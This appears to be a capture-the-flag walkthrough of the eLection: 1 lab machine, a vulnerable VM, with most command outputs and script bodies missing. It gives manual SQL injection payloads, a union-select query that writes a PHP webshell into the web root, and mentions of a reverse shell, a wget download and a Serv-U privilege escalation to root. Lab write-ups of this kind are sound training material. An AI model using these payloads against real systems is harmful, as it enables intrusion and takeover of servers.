eLection: 1 Walkthrough
reference | eLection: 1 |
target ip | 192.168.1.9 |
Scan with nmap
:
Enumerate HTTP with gobuster
:
Request http://192.168.1.9/robots.txt
:
Request http://192.168.1.9/election
:
eLection 2.0 - ‘id’ SQL Injection needs authenticated privileges.
Enumerate HTTP with gobuster
again:
Request http://192.168.1.9/election/card.php
:
1 | #!/usr/bin/env python3 |
Login into eLection, which is located at http://192.168.1.9/election/admin
:
Enumerate eLection version:
Edit candidates:
Use sqlmap
instead to save time.
SQLi manually.id=76 order by 6--
:
id=76 order by 5--
:
id=1 union select 'a','b','c','d','e'--
:
id=1 union select 'a',user(),version(),'d','e'--
:
http://192.168.1.9/phpinfo.php
:
id=1 union select 'a','b','c','d',"<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/cmd.php'--
to upload a webshell to the target:
Transfer rs.php
from Kali to the target:
or just sqli with “system(‘wget xxx’)”
Reverse shell:
Enumerate suid
:
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1).
Escalate from user www-data to user root:
/root/root.txt
:
/home/love/Desktop/user.txt
:
/var/www/.bash_history
/var/www/html/election/admin/inc/conn.php
: